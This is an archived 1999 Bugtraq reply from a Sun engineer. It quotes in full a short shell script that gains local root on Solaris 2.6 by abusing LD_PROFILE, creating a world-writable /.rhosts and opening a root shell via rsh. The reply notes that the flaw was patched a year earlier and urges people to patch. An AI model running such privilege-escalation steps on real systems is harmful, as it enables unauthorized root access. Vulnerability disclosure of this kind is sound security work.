[11997] in bugtraq
Re: LD_PROFILE local root exploit for solaris 2.6
daemon@ATHENA.MIT.EDU (Darren Moffat - Solaris Sustaining)
Sun Sep 26 02:48:58 1999
Mime-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Content-Md5: 4Z54F1ajBqdnItZIYvEl9A==
Message-Id: <199909240900.KAA04426@otis.UK.Sun.COM>
Date: Fri, 24 Sep 1999 10:00:46 +0100
Reply-To: Darren Moffat - Solaris Sustaining Engineering <darren.moffat@sunuk.UK.Sun.COM>
From: Darren Moffat - Solaris Sustaining Engineering <darren.moffat@SUNUK.UK.SUN.COM>
X-To: steve@TIGHTROPE.DEMON.CO.UK
To: BUGTRAQ@SECURITYFOCUS.COM
>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
># LD_PROFILE local root exploit for solaris
># steve@tightrope.demon.co.uk 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + > /.rhosts
>rsh -l root localhost csh -i
This was bug# 4150646/1241843 which is fixed in patch 105490-05 (or higher),
which was released over 1 year ago (Sep/10/98)!
Patch 105490-07 is in the current recommened patch set for Solaris 2.6,
so it is publicly available.
I strongly recommend that people apply the latest recommended and security
patch sets when testing out security exploits. That way you won't send
out information about exploits which have been long fixed and needlessly
panic people.
--
Darren J Moffat
